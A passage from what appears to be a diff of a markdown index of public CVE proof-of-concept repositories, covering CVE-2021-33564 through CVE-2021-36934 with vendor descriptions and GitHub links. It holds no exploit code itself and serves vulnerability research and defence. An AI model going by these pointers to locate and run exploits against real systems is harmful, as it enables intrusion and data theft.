remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility. + + +- [mlr0p/CVE-2021-33564](https://github.com/mlr0p/CVE-2021-33564) +- [dorkerdevil/CVE-2021-33564](https://github.com/dorkerdevil/CVE-2021-33564) + +### CVE-2021-33624 (2021-06-23) + +In kernel/bpf/verifier.c in the Linux kernel before 5.12.13, a branch can be mispredicted (e.g., because of type confusion) and consequently an unprivileged BPF program can read arbitrary memory locations via a side-channel attack, aka CID-9183671af6db. + + +- [benschlueter/CVE-2021-33624](https://github.com/benschlueter/CVE-2021-33624) + +### CVE-2021-33690 (2021-09-15) + +Server-Side Request Forgery (SSRF) vulnerability has been detected in the SAP NetWeaver Development Infrastructure Component Build Service versions - 7.11, 7.20, 7.30, 7.31, 7.40, 7.50The SAP NetWeaver Development Infrastructure Component Build Service allows a threat actor who has access to the server to perform proxy attacks on server by sending crafted queries. Due to this, the threat actor could completely compromise sensitive data residing on the Server and impact its availability.Note: The impact of this vulnerability depends on whether SAP NetWeaver Development Infrastructure (NWDI) runs on the intranet or internet. The CVSS score reflects the impact considering the worst-case scenario that it runs on the internet. + + +- [redrays-io/CVE-2021-33690](https://github.com/redrays-io/CVE-2021-33690) + +### CVE-2021-33699 (2021-08-10) + +Task Hijacking is a vulnerability that affects the applications running on Android devices due to a misconfiguration in their AndroidManifest.xml with their Task Control features. This allows an unauthorized attacker or malware to takeover legitimate apps and to steal user's sensitive information. + + +- [naroSEC/CVE-2021-33699_Task_Hijacking](https://github.com/naroSEC/CVE-2021-33699_Task_Hijacking) + +### CVE-2021-33739 (2021-06-08) + +Microsoft DWM Core Library Elevation of Privilege Vulnerability + + +- [freeide2017/CVE-2021-33739-POC](https://github.com/freeide2017/CVE-2021-33739-POC) +- [giwon9977/CVE-2021-33739_PoC_Analysis](https://github.com/giwon9977/CVE-2021-33739_PoC_Analysis) + +### CVE-2021-33766 (2021-07-14) + +Microsoft Exchange Server Information Disclosure Vulnerability + + +- [bhdresh/CVE-2021-33766](https://github.com/bhdresh/CVE-2021-33766) +- [demossl/CVE-2021-33766-ProxyToken](https://github.com/demossl/CVE-2021-33766-ProxyToken) + +### CVE-2021-33831 (2021-09-07) + +api/account/register in the TH Wildau COVID-19 Contact Tracing application through 2021-09-01 has Incorrect Access Control. An attacker can interfere with tracing of infection chains by creating 500 random users within 2500 seconds. + + +- [lanmarc77/CVE-2021-33831](https://github.com/lanmarc77/CVE-2021-33831) + +### CVE-2021-33879 (2021-06-06) + +Tencent GameLoop before 4.1.21.90 downloaded updates over an insecure HTTP connection. A malicious attacker in an MITM position could spoof the contents of an XML document describing an update package, replacing a download URL with one pointing to an arbitrary Windows executable. Because the only integrity check would be a comparison of the downloaded file's MD5 checksum to the one contained within the XML document, the downloaded executable would then be executed on the victim's machine. + + +- [mmiszczyk/cve-2021-33879](https://github.com/mmiszczyk/cve-2021-33879) + +### CVE-2021-33909 (2021-07-20) + +fs/seq_file.c in the Linux kernel 3.16 through 5.13.x before 5.13.4 does not properly restrict seq buffer allocations, leading to an integer overflow, an Out-of-bounds Write, and escalation to root by an unprivileged user, aka CID-8cae8cd89f05. + + +- [Liang2580/CVE-2021-33909](https://github.com/Liang2580/CVE-2021-33909) +- [baerwolf/cve-2021-33909](https://github.com/baerwolf/cve-2021-33909) +- [bbinfosec43/CVE-2021-33909](https://github.com/bbinfosec43/CVE-2021-33909) +- [ChrisTheCoolHut/CVE-2021-33909](https://github.com/ChrisTheCoolHut/CVE-2021-33909) + +### CVE-2021-33959 (2023-01-18) + +Plex media server 1.21 and before is vulnerable to ddos reflection attack via plex service. + + +- [lixiang957/CVE-2021-33959](https://github.com/lixiang957/CVE-2021-33959) + +### CVE-2021-34045 +- [Al1ex/CVE-2021-34045](https://github.com/Al1ex/CVE-2021-34045) +- [kenuosec/CVE-2021-34045](https://github.com/kenuosec/CVE-2021-34045) + +### CVE-2021-34371 (2021-08-05) + +Neo4j through 3.4.18 (with the shell server enabled) exposes an RMI service that arbitrarily deserializes Java objects, e.g., through setSessionVariable. An attacker can abuse this for remote code execution because there are dependencies with exploitable gadget chains. + + +- [zwjjustdoit/CVE-2021-34371.jar](https://github.com/zwjjustdoit/CVE-2021-34371.jar) + +### CVE-2021-34428 (2021-06-22) + +For Eclipse Jetty versions <= 9.4.40, <= 10.0.2, <= 11.0.2, if an exception is thrown from the SessionListener#sessionDestroyed() method, then the session ID is not invalidated in the session ID manager. On deployments with clustered sessions and multiple contexts this can result in a session not being invalidated. This can result in an application used on a shared computer being left logged in. + + +- [Trinadh465/jetty_9.4.31_CVE-2021-34428](https://github.com/Trinadh465/jetty_9.4.31_CVE-2021-34428) + +### CVE-2021-34429 (2021-07-15) + +For Eclipse Jetty versions 9.4.37-9.4.42, 10.0.1-10.0.5 & 11.0.1-11.0.5, URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5. + + +- [ColdFusionX/CVE-2021-34429](https://github.com/ColdFusionX/CVE-2021-34429) + +### CVE-2021-34470 (2021-07-14) + +Microsoft Exchange Server Elevation of Privilege Vulnerability + + +- [technion/CVE-2021-34470scanner](https://github.com/technion/CVE-2021-34470scanner) + +### CVE-2021-34473 (2021-07-14) + +Microsoft Exchange Server Remote Code Execution Vulnerability + + +- [cyberheartmi9/Proxyshell-Scanner](https://github.com/cyberheartmi9/Proxyshell-Scanner) +- [RaouzRouik/CVE-2021-34473-scanner](https://github.com/RaouzRouik/CVE-2021-34473-scanner) +- [p2-98/CVE-2021-34473](https://github.com/p2-98/CVE-2021-34473) +- [horizon3ai/proxyshell](https://github.com/horizon3ai/proxyshell) +- [je6k/CVE-2021-34473-Exchange-ProxyShell](https://github.com/je6k/CVE-2021-34473-Exchange-ProxyShell) +- [learningsurface/ProxyShell-CVE-2021-34473.py](https://github.com/learningsurface/ProxyShell-CVE-2021-34473.py) +- [kh4sh3i/ProxyShell](https://github.com/kh4sh3i/ProxyShell) +- [ipsBruno/CVE-2021-34473-NMAP-SCANNER](https://github.com/ipsBruno/CVE-2021-34473-NMAP-SCANNER) +- [f4alireza/CVE](https://github.com/f4alireza/CVE) + +### CVE-2021-34481 (2021-07-16) + +<p>A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.</p>\n<p><strong>UPDATE</strong> August 10, 2021: Microsoft has completed the investigation and has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. This security update changes the Point and Print default behavior; please see <a href="https://support.microsoft.com/help/5005652">KB5005652</a>.</p>\n + + +- [vpn28/CVE-2021-34481](https://github.com/vpn28/CVE-2021-34481) + +### CVE-2021-34486 (2021-08-12) + +Windows Event Tracing Elevation of Privilege Vulnerability + + +- [KaLendsi/CVE-2021-34486](https://github.com/KaLendsi/CVE-2021-34486) +- [b1tg/CVE-2021-34486-exp](https://github.com/b1tg/CVE-2021-34486-exp) + +### CVE-2021-34496 (2021-07-14) + +Windows GDI Information Disclosure Vulnerability + + +- [dja2TaqkGEEfA45/CVE-2021-34496](https://github.com/dja2TaqkGEEfA45/CVE-2021-34496) + +### CVE-2021-34523 (2021-07-14) + +Microsoft Exchange Server Elevation of Privilege Vulnerability + + +- [mithridates1313/ProxyShell_POC](https://github.com/mithridates1313/ProxyShell_POC) +- [SUPRAAA-1337/CVE-2021-34523](https://github.com/SUPRAAA-1337/CVE-2021-34523) + +### CVE-2021-34527 (2021-07-02) + +<p>A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.</p>\n<p>UPDATE July 7, 2021: The security update for Windows Server 2012, Windows Server 2016 and Windows 10, Version 1607 have been released. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. If you are unable to install these updates, see the FAQ and Workaround sections in this CVE for information on how to help protect your system from this vulnerability.</p>\n<p>In addition to installing the updates, in order to secure your system, you must confirm that the following registry settings are set to 0 (zero) or are not defined (<strong>Note</strong>: These registry keys do not exist by default, and therefore are already at the secure setting.), also that your Group Policy setting are correct (see FAQ):</p>\n<ul>\n<li>HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint</li>\n<li>NoWarningNoElevationOnInstall = 0 (DWORD) or not defined (default setting)</li>\n<li>UpdatePromptSettings = 0 (DWORD) or not defined (default setting)</li>\n</ul>\n<p><strong>Having NoWarningNoElevationOnInstall set to 1 makes your system vulnerable by design.</strong></p>\n<p>UPDATE July 6, 2021: Microsoft has completed the investigation and has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. If you are unable to install these updates, see the FAQ and Workaround sections in this CVE for information on how to help protect your system from this vulnerability. See also <a href="https://support.microsoft.com/topic/31b91c02-05bc-4ada-a7ea-183b129578a7">KB5005010: Restricting installation of new printer drivers after applying the July 6, 2021 updates</a>.</p>\n<p>Note that the security updates released on and after July 6, 2021 contain protections for CVE-2021-1675 and the additional remote code execution exploit in the Windows Print Spooler service known as “PrintNightmare”, documented in CVE-2021-34527.</p>\n + + +- [DenizSe/CVE-2021-34527](https://github.com/DenizSe/CVE-2021-34527) +- [thomas-lauer/PrintNightmare](https://github.com/thomas-lauer/PrintNightmare) +- [JohnHammond/CVE-2021-34527](https://github.com/JohnHammond/CVE-2021-34527) +- [nemo-wq/PrintNightmare-CVE-2021-34527](https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527) +- [CnOxx1/CVE-2021-34527-1675](https://github.com/CnOxx1/CVE-2021-34527-1675) +- [rdboboia/disable-RegisterSpoolerRemoteRpcEndPoint](https://github.com/rdboboia/disable-RegisterSpoolerRemoteRpcEndPoint) +- [geekbrett/CVE-2021-34527-PrintNightmare-Workaround](https://github.com/geekbrett/CVE-2021-34527-PrintNightmare-Workaround) +- [byt3bl33d3r/ItWasAllADream](https://github.com/byt3bl33d3r/ItWasAllADream) +- [vinaysudheer/Disable-Spooler-Service-PrintNightmare-CVE-2021-34527](https://github.com/vinaysudheer/Disable-Spooler-Service-PrintNightmare-CVE-2021-34527) +- [powershellpr0mpt/PrintNightmare-CVE-2021-34527](https://github.com/powershellpr0mpt/PrintNightmare-CVE-2021-34527) +- [WidespreadPandemic/CVE-2021-34527_ACL_mitigation](https://github.com/WidespreadPandemic/CVE-2021-34527_ACL_mitigation) +- [glorisonlai/printnightmare](https://github.com/glorisonlai/printnightmare) +- [dywhoami/CVE-2021-34527-Scanner-Based-On-cube0x0-POC](https://github.com/dywhoami/CVE-2021-34527-Scanner-Based-On-cube0x0-POC) +- [Eutectico/Printnightmare](https://github.com/Eutectico/Printnightmare) +- [syntaxbearror/PowerShell-PrintNightmare](https://github.com/syntaxbearror/PowerShell-PrintNightmare) +- [0xirison/PrintNightmare-Patcher](https://github.com/0xirison/PrintNightmare-Patcher) +- [Tomparte/PrintNightmare](https://github.com/Tomparte/PrintNightmare) +- [Amaranese/CVE-2021-34527](https://github.com/Amaranese/CVE-2021-34527) +- [cyb3rpeace/CVE-2021-34527](https://github.com/cyb3rpeace/CVE-2021-34527) +- [m8sec/CVE-2021-34527](https://github.com/m8sec/CVE-2021-34527) +- [hackerhouse-opensource/cve-2021-34527](https://github.com/hackerhouse-opensource/cve-2021-34527) +- [d0rb/CVE-2021-34527](https://github.com/d0rb/CVE-2021-34527) +- [TieuLong21Prosper/detect_bruteforce](https://github.com/TieuLong21Prosper/detect_bruteforce) +- [Hirusha-N/CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784](https://github.com/Hirusha-N/CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784) + +### CVE-2021-34558 (2021-07-15) + +The crypto/tls package of Go through 1.16.5 does not properly assert that the type of public key in an X.509 certificate matches the expected type when doing a RSA based key exchange, allowing a malicious TLS server to cause a TLS client to panic. + + +- [alexzorin/cve-2021-34558](https://github.com/alexzorin/cve-2021-34558) + +### CVE-2021-34600 (2022-01-20) + +Telenot CompasX versions prior to 32.0 use a weak seed for random number generation leading to predictable AES keys used in the NFC tags used for local authorization of users. This may lead to total loss of trustworthiness of the installation. + + +- [x41sec/CVE-2021-34600](https://github.com/x41sec/CVE-2021-34600) + +### CVE-2021-34621 (2021-07-07) + +A vulnerability in the user registration component found in the ~/src/Classes/RegistrationAuth.php file of the ProfilePress WordPress plugin made it possible for users to register on sites as an administrator. This issue affects versions 3.0.0 - 3.1.3. . + + +- [RandomRobbieBF/CVE-2021-34621](https://github.com/RandomRobbieBF/CVE-2021-34621) +- [K3ysTr0K3R/CVE-2021-34621-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2021-34621-EXPLOIT) +- [navreet1425/CVE-2021-34621](https://github.com/navreet1425/CVE-2021-34621) + +### CVE-2021-34646 (2021-08-30) + +Versions up to, and including, 5.4.3, of the Booster for WooCommerce WordPress plugin are vulnerable to authentication bypass via the process_email_verification function due to a random token generation weakness in the reset_and_mail_activation_link function found in the ~/includes/class-wcj-emails-verification.php file. This allows attackers to impersonate users and trigger an email address verification for arbitrary accounts, including administrative accounts, and automatically be logged in as that user, including any site administrators. This requires the Email Verification module to be active in the plugin and the Login User After Successful Verification setting to be enabled, which it is by default. + + +- [motikan2010/CVE-2021-34646](https://github.com/motikan2010/CVE-2021-34646) +- [0xB455/CVE-2021-34646](https://github.com/0xB455/CVE-2021-34646) + +### CVE-2021-34730 (2021-08-18) + +A vulnerability in the Universal Plug-and-Play (UPnP) service of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly, resulting in a denial of service (DoS) condition. This vulnerability is due to improper validation of incoming UPnP traffic. An attacker could exploit this vulnerability by sending a crafted UPnP request to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a DoS condition. Cisco has not released software updates that address this vulnerability. + + +- [badmonkey7/CVE-2021-34730](https://github.com/badmonkey7/CVE-2021-34730) + +### CVE-2021-34767 (2021-09-23) + +A vulnerability in IPv6 traffic processing of Cisco IOS XE Wireless Controller Software for Cisco Catalyst 9000 Family Wireless Controllers could allow an unauthenticated, adjacent attacker to cause a Layer 2 (L2) loop in a configured VLAN, resulting in a denial of service (DoS) condition for that VLAN. The vulnerability is due to a logic error when processing specific link-local IPv6 traffic. An attacker could exploit this vulnerability by sending a crafted IPv6 packet that would flow inbound through the wired interface of an affected device. A successful exploit could allow the attacker to cause traffic drops in the affected VLAN, thus triggering the DoS condition. + + +- [lukejenkins/CVE-2021-34767](https://github.com/lukejenkins/CVE-2021-34767) + +### CVE-2021-34824 (2021-06-29) + +Istio (1.8.x, 1.9.0-1.9.5 and 1.10.0-1.10.1) contains a remotely exploitable vulnerability where credentials specified in the Gateway and DestinationRule credentialName field can be accessed from different namespaces. + + +- [rsalmond/CVE-2021-34824](https://github.com/rsalmond/CVE-2021-34824) + +### CVE-2021-35042 (2021-07-02) + +Django 3.1.x before 3.1.13 and 3.2.x before 3.2.5 allows QuerySet.order_by SQL injection if order_by is untrusted input from a client of a web application. + + +- [YouGina/CVE-2021-35042](https://github.com/YouGina/CVE-2021-35042) +- [mrlihd/CVE-2021-35042](https://github.com/mrlihd/CVE-2021-35042) +- [r4vi/CVE-2021-35042](https://github.com/r4vi/CVE-2021-35042) +- [zer0qs/CVE-2021-35042](https://github.com/zer0qs/CVE-2021-35042) +- [LUUANHDUC/CVE-2021-35042](https://github.com/LUUANHDUC/CVE-2021-35042) + +### CVE-2021-35064 (2021-07-12) + +KramerAV VIAWare, all tested versions, allow privilege escalation through misconfiguration of sudo. Sudoers permits running of multiple dangerous commands, including unzip, systemctl and dpkg. + + +- [Chocapikk/CVE-2021-35064](https://github.com/Chocapikk/CVE-2021-35064) + +### CVE-2021-35211 (2021-07-14) + +Microsoft discovered a remote code execution (RCE) vulnerability in the SolarWinds Serv-U product utilizing a Remote Memory Escape Vulnerability. If exploited, a threat actor may be able to gain privileged access to the machine hosting Serv-U Only. SolarWinds Serv-U Managed File Transfer and Serv-U Secure FTP for Windows before 15.2.3 HF2 are affected by this vulnerability. + + +- [NattiSamson/Serv-U-CVE-2021-35211](https://github.com/NattiSamson/Serv-U-CVE-2021-35211) +- [0xhaggis/CVE-2021-35211](https://github.com/0xhaggis/CVE-2021-35211) +- [BishopFox/CVE-2021-35211](https://github.com/BishopFox/CVE-2021-35211) + +### CVE-2021-35215 (2021-09-01) + +Insecure deserialization leading to Remote Code Execution was detected in the Orion Platform version 2020.2.5. Authentication is required to exploit this vulnerability. + + +- [Y4er/CVE-2021-35215](https://github.com/Y4er/CVE-2021-35215) + +### CVE-2021-35250 (2022-04-25) + +A researcher reported a Directory Transversal Vulnerability in Serv-U 15.3. This may allow access to files relating to the Serv-U installation and server files. This issue has been resolved in Serv-U 15.3 Hotfix 1. + + +- [rissor41/SolarWinds-CVE-2021-35250](https://github.com/rissor41/SolarWinds-CVE-2021-35250) + +### CVE-2021-35296 (2021-10-04) + +An issue in the administrator authentication panel of PTCL HG150-Ub v3.0 allows attackers to bypass authentication via modification of the cookie value and Response Path. + + +- [afaq1337/CVE-2021-35296](https://github.com/afaq1337/CVE-2021-35296) + +### CVE-2021-35464 (2021-07-22) + +ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages. The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO) found in versions of Java 8 or earlier + + +- [Y4er/openam-CVE-2021-35464](https://github.com/Y4er/openam-CVE-2021-35464) +- [rood8008/CVE-2021-35464](https://github.com/rood8008/CVE-2021-35464) + +### CVE-2021-35475 (2021-06-25) + +SAS Environment Manager 2.5 allows XSS through the Name field when creating/editing a server. The XSS will prompt when editing the Configuration Properties. + + +- [saitamang/CVE-2021-35475](https://github.com/saitamang/CVE-2021-35475) + +### CVE-2021-35492 (2021-10-05) + +Wowza Streaming Engine through 4.8.11+5 could allow an authenticated, remote attacker to exhaust filesystem resources via the /enginemanager/server/vhost/historical.jsdata vhost parameter. This is due to the insufficient management of available filesystem resources. An attacker could exploit this vulnerability through the Virtual Host Monitoring section by requesting random virtual-host historical data and exhausting available filesystem resources. A successful exploit could allow the attacker to cause database errors and cause the device to become unresponsive to web-based management. (Manual intervention is required to free filesystem resources and return the application to an operational state.) + + +- [N4nj0/CVE-2021-35492](https://github.com/N4nj0/CVE-2021-35492) + +### CVE-2021-35576 (2021-10-20) + +Vulnerability in the Oracle Database Enterprise Edition Unified Audit component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1 and 19c. Easily exploitable vulnerability allows high privileged attacker having Local Logon privilege with network access via Oracle Net to compromise Oracle Database Enterprise Edition Unified Audit. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Database Enterprise Edition Unified Audit accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N). + + +- [emad-almousa/CVE-2021-35576](https://github.com/emad-almousa/CVE-2021-35576) + +### CVE-2021-35587 (2022-01-19) + +Vulnerability in the Oracle Access Manager product of Oracle Fusion Middleware (component: OpenSSO Agent). Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Access Manager. Successful attacks of this vulnerability can result in takeover of Oracle Access Manager. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [ZZ-SOCMAP/CVE-2021-35587](https://github.com/ZZ-SOCMAP/CVE-2021-35587) + +### CVE-2021-35616 (2021-10-20) + +Vulnerability in the Oracle Transportation Management product of Oracle Supply Chain (component: UI Infrastructure). The supported version that is affected is 6.4.3. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Transportation Management. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Transportation Management accessible data as well as unauthorized read access to a subset of Oracle Transportation Management accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N). + + +- [Ofirhamam/OracleOTM](https://github.com/Ofirhamam/OracleOTM) + +### CVE-2021-35956 (2021-06-30) + +Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields. + + +- [tcbutler320/CVE-2021-35956](https://github.com/tcbutler320/CVE-2021-35956) + +### CVE-2021-35958 (2021-06-30) + +TensorFlow through 2.5.0 allows attackers to overwrite arbitrary files via a crafted archive when tf.keras.utils.get_file is used with extract=True. NOTE: the vendor's position is that tf.keras.utils.get_file is not intended for untrusted archives + + +- [miguelc49/CVE-2021-35958-2](https://github.com/miguelc49/CVE-2021-35958-2) +- [miguelc49/CVE-2021-35958-1](https://github.com/miguelc49/CVE-2021-35958-1) + +### CVE-2021-35975 (2023-11-30) + +Absolute path traversal vulnerability in the Systematica SMTP Adapter component (up to v2.0.1.101) in Systematica Radius (up to v.3.9.256.777) allows remote attackers to read arbitrary files via a full pathname in GET parameter "file" in URL. Also: affected components in same product - HTTP Adapter (up to v.1.8.0.15), MSSQL MessageBus Proxy (up to v.1.1.06), Financial Calculator (up to v.1.3.05), FIX Adapter (up to v.2.4.0.25) + + +- [fbkcs/CVE-2021-35975](https://github.com/fbkcs/CVE-2021-35975) + +### CVE-2021-36260 (2021-09-22) + +A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands. + + +- [rabbitsafe/CVE-2021-36260](https://github.com/rabbitsafe/CVE-2021-36260) +- [Aiminsun/CVE-2021-36260](https://github.com/Aiminsun/CVE-2021-36260) +- [TaroballzChen/CVE-2021-36260-metasploit](https://github.com/TaroballzChen/CVE-2021-36260-metasploit) +- [tuntin9x/CheckHKRCE](https://github.com/tuntin9x/CheckHKRCE) +- [Cuerz/CVE-2021-36260](https://github.com/Cuerz/CVE-2021-36260) +- [TakenoSite/Simple-CVE-2021-36260](https://github.com/TakenoSite/Simple-CVE-2021-36260) +- [r3t4k3r/hikvision_brute](https://github.com/r3t4k3r/hikvision_brute) +- [haingn/HIK-CVE-2021-36260-Exploit](https://github.com/haingn/HIK-CVE-2021-36260-Exploit) +- [aengussong/hikvision_probe](https://github.com/aengussong/hikvision_probe) + +### CVE-2021-36393 (2023-03-06) + +In Moodle, an SQL injection risk was identified in the library fetching a user's recent courses. + + +- [StackOverflowExcept1on/CVE-2021-36393](https://github.com/StackOverflowExcept1on/CVE-2021-36393) + +### CVE-2021-36394 (2023-03-06) + +In Moodle, a remote code execution risk was identified in the Shibboleth authentication plugin. + + +- [dinhbaouit/CVE-2021-36394](https://github.com/dinhbaouit/CVE-2021-36394) +- [lavclash75/CVE-2021-36394-Pre-Auth-RCE-in-Moodle](https://github.com/lavclash75/CVE-2021-36394-Pre-Auth-RCE-in-Moodle) + +### CVE-2021-36396 (2023-03-06) + +In Moodle, insufficient redirect handling made it possible to blindly bypass cURL blocked hosts/allowed ports restrictions, resulting in a blind SSRF risk. + + +- [T0X1Cx/CVE-2021-36396-Exploit](https://github.com/T0X1Cx/CVE-2021-36396-Exploit) + +### CVE-2021-36460 (2022-04-25) + +VeryFitPro (com.veryfit2hr.second) 3.2.8 hashes the account's password locally on the device and uses the hash to authenticate in all communication with the backend API, including login, registration and changing of passwords. This allows an attacker in possession of a hash to takeover a user's account, rendering the benefits of storing hashed passwords in the database useless. + + +- [martinfrancois/CVE-2021-36460](https://github.com/martinfrancois/CVE-2021-36460) + +### CVE-2021-36563 (2021-07-26) + +The CheckMK management web console (versions 1.5.0 to 2.0.0) does not sanitise user input in various parameters of the WATO module. This allows an attacker to open a backdoor on the device with HTML content and interpreted by the browser (such as JavaScript or other client-side scripts), the XSS payload will be triggered when the user accesses some specific sections of the application. In the same sense a very dangerous potential way would be when an attacker who has the monitor role (not administrator) manages to get a stored XSS to steal the secretAutomation (for the use of the API in administrator mode) and thus be able to create another administrator user who has high privileges on the CheckMK monitoring web console. Another way is that persistent XSS allows an attacker to modify the displayed content or change the victim's information. Successful exploitation requires access to the web management interface, either with valid credentials or with a hijacked session. + + +- [Edgarloyola/CVE-2021-36563](https://github.com/Edgarloyola/CVE-2021-36563) + +### CVE-2021-36593 +- [mir-hossein/Statement](https://github.com/mir-hossein/Statement) + +### CVE-2021-36630 (2023-01-18) + +DDOS reflection amplification vulnerability in eAut module of Ruckus Wireless SmartZone controller that allows remote attackers to perform DOS attacks via crafted request. + + +- [lixiang957/CVE-2021-36630](https://github.com/lixiang957/CVE-2021-36630) + +### CVE-2021-36747 (2021-07-20) + +Blackboard Learn through 9.1 allows XSS by an authenticated user via the Feedback to Learner form. + + +- [cseasholtz/CVE-2021-36747](https://github.com/cseasholtz/CVE-2021-36747) + +### CVE-2021-36749 (2021-09-24) + +In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1. + + +- [sma11new/PocList](https://github.com/sma11new/PocList) +- [BrucessKING/CVE-2021-36749](https://github.com/BrucessKING/CVE-2021-36749) +- [zwlsix/apache_druid_CVE-2021-36749](https://github.com/zwlsix/apache_druid_CVE-2021-36749) +- [Jun-5heng/CVE-2021-36749](https://github.com/Jun-5heng/CVE-2021-36749) + +### CVE-2021-36750 (2021-12-22) + +ENC DataVault before 7.2 and VaultAPI v67 mishandle key derivation, making it easier for attackers to determine the passwords of all DataVault users (across USB drives sold under multiple brand names). + + +- [mamba-4-ever/CVE-2021-36750](https://github.com/mamba-4-ever/CVE-2021-36750) + +### CVE-2021-36782 (2022-09-07) + +A Cleartext Storage of Sensitive Information vulnerability in SUSE Rancher allows authenticated Cluster Owners, Cluster Members, Project Owners, Project Members and User Base to use the Kubernetes API to retrieve plaintext version of sensitive data. This issue affects: SUSE Rancher Rancher versions prior to 2.5.16; Rancher versions prior to 2.6.7. + + +- [fe-ax/tf-cve-2021-36782](https://github.com/fe-ax/tf-cve-2021-36782) + +### CVE-2021-36798 (2021-08-09) + +A Denial-of-Service (DoS) vulnerability was discovered in Team Server in HelpSystems Cobalt Strike 4.2 and 4.3. It allows remote attackers to crash the C2 server thread and block beacons' communication with it. + + +- [M-Kings/CVE-2021-36798](https://github.com/M-Kings/CVE-2021-36798) +- [JamVayne/CobaltStrikeDos](https://github.com/JamVayne/CobaltStrikeDos) +- [sponkmonk/CobaltSploit](https://github.com/sponkmonk/CobaltSploit) + +### CVE-2021-36799 (2021-07-19) + +KNX ETS5 through 5.7.6 uses the hard-coded password ETS5Password, with a salt value of Ivan Medvedev, allowing local users to read project information. NOTE: This vulnerability only affects products that are no longer supported by the maintainer + + +- [robertguetzkow/ets5-password-recovery](https://github.com/robertguetzkow/ets5-password-recovery) + +### CVE-2021-36808 (2021-10-30) + +A local attacker could bypass the app password using a race condition in Sophos Secure Workspace for Android before version 9.7.3115. + + +- [ctuIhu/CVE-2021-36808](https://github.com/ctuIhu/CVE-2021-36808) + +### CVE-2021-36934 (2021-07-22) + +<p>An elevation of privilege vulnerability exists because of overly permissive Access Control Lists (ACLs) on multiple system files, including the Security Accounts Manager (SAM) database. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.</p>\n<p>An attacker must have the ability to execute code on a victim system to exploit this vulnerability.</p>\n<p>After installing this security update, you <em>must</em> manually delete all shadow copies of system files, including the SAM database, to fully mitigate this vulnerabilty. <strong>Simply installing this security update will not fully mitigate this vulnerability.</strong> See <a href="https://support.microsoft.com/topic/1ceaa637-aaa3-4b58-a48b-baf72a2fa9e7">KB5005357- Delete Volume Shadow Copies</a>.</p>\n + + +- [HuskyHacks/ShadowSteal](https://github.com/HuskyHacks/ShadowSteal) +- [JoranSlingerland/CVE-2021-36934](https://github.com/JoranSlingerland/CVE-2021-36934) +- [n3tsurge/CVE-2021-36934](https://github.com/n3tsurge/CVE-2021-36934) +- [Wh04m1001/VSSCopy](https://github.com/Wh04m1001/VSSCopy) +- [WiredPulse/Invoke-HiveNightmare](https://github.com/WiredPulse/Invoke-HiveNightmare) +- [romarroca/SeriousSam](https://github.com/romarroca/SeriousSam) +- [WiredPulse/Invoke-HiveDreams](https://github.com/WiredPulse/Invoke-HiveDreams) +- [tda90/CVE-2021-36934](https://github.com/tda90/CVE-2021-36934) +- [VertigoRay/CVE-2021-36934](https://github.com/VertigoRay/CVE-2021-36934) +- [bytesizedalex/CVE-2021-36934](https://github.com/bytesizedalex/CVE-2021-36934) +- [Preventions/CVE-2021-36934](https://github.com/Preventions/CVE-2021-36934) +- 